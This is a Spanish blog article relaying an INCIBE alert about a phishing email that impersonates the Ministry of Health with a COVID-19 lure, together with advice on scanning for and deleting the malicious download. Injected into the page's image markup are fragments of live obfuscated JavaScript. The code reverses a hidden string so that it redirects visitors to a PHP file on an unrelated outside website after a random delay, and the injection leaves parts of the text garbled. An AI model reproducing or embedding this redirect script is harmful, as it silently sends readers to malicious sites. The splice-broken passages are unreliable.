Cuidado con descargar este email que suplanta al Ministerio de Sanidad, tiene malware
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tografias.lasexta.com/clipping/cmsimages01/2020/10/26/B6B22D2F-E809-41FF-BB4F-4B77474A978E/58.jpg” width=”1000″ height=”567″ /></p>
<p><b>Una vez más se ha utilizado el COVID-19 para atacar a los internautas suplantando a un organismo oficial</b></p>
<p>Tristemente ya nos hemos acostumbrado al malware y a <script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
todas las amenazas que representa. En sus distintas formas y en diferentes entornos, este tipo de software ha sido desarrollado para poder hacerse con datos sensible de las víctimas, que en la mayoría de casos se usan contra ellas, para robar su dinero, o extorsionarlos también con el mismo objetivo, obtener dinero de amenazando con difundir cierto material. Ahora hemos conocido una nueva campaña de malware, tal y como ha “denunciado” INCIBE, que utiliza el coronavirus para suplantar al Ministerio de Sanidad con un objetivo fraudulento.
No caigas en la trampa
Según el comunicado del Instituto Nacional de Ciberseguridad, esta campaña utiliza un correo electrónico con el asunto “Urgente – Información CORONAVIRUS” para engañar a las víctimas. En este mensaje de correo se ofrece información a los usuarios sobre nuevos protocolos del Ministerio de Sanidad, Consumo y Bienestar Social para combatir el virus. Un mensaje que se envía en el marco de la declaración del nuevo Estado de Alarma anunciado ayer por el ejecutivo de Pedro Sánchez. Y como suele ser habitual en este tipo de correos fraudulentos, se incluye un enlace que es el que nos lleva a una descarga, el modus operandi habitual de este tipo de malware.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tografias.lasexta.com/clipping/cmsimages01/2020/10/26/E900B7AD-F987-427A-A304-B335736FD391/58.jpg” width=”1000″ height=”567″ /></p>
<p>Adjun<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to con malware | INCIBE
Esa descarga se incluye con el pretexto de acceder a la circular del Ministerio con estas nuevas instrucciones relacionadas con el COVID-19 y la lucha por limitar su expansión. Como es habitual, si la persona que recibe este enlace pulsa sobre él, verá cómo se le redirige a una página web con fines maliciosos, que es el sitio desde donde se descarga el malware. El fichero de la descarga se llama “rnh_Fichero_ES.zip”. Desde INCIBE apuntan a que no es descartable que los hackers hayan utilizado diferentes denominaciones para otros enlaces al malware, con el fin de despistar a los usuarios.
¿Qué hacer si hemos sido víctimas?
Lógicamente en el caso de haber recibido este correo electrónico y haber descargado el malware, lo mejor es que hagamos un escaneo del ordenador en busca de malware. Para ello basta con hacer una búsqueda con Windows Defender, que como sabéis es el antivirus integrado en el sistema operativo de Microsoft. Por otro lado si hay otro antivirus o antimalware con el que estéis más familiarizados, no hay problema tampoco en utilizarlo. Por otro lado puedes hacer una búsqueda con el explorador de archivos. De un archivo que tenga ese mismo nombre al que nos hemos referido antes. Así podrías eliminarlo del sistema de archivos, minimizando de esta forma la expansión del malware.
Y solo nos queda recomendaros que extreméis la precaución a la hora de descargar archivos adjuntos de correos electrónicos. Además de tener en cuenta que el correo electrónico no suele ser un medio de comunicación habitual en las administraciones, por lo que además todos aquellos mensajes en los que se incite a la descarga de un archivos o el acceso a una web, deberías mandarlos directamente a la papelera, sobre todo representando presuntamente a organismos públicos, como en este caso el Ministerio de Sanidad.
Ver información original al respecto en Fuente>
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.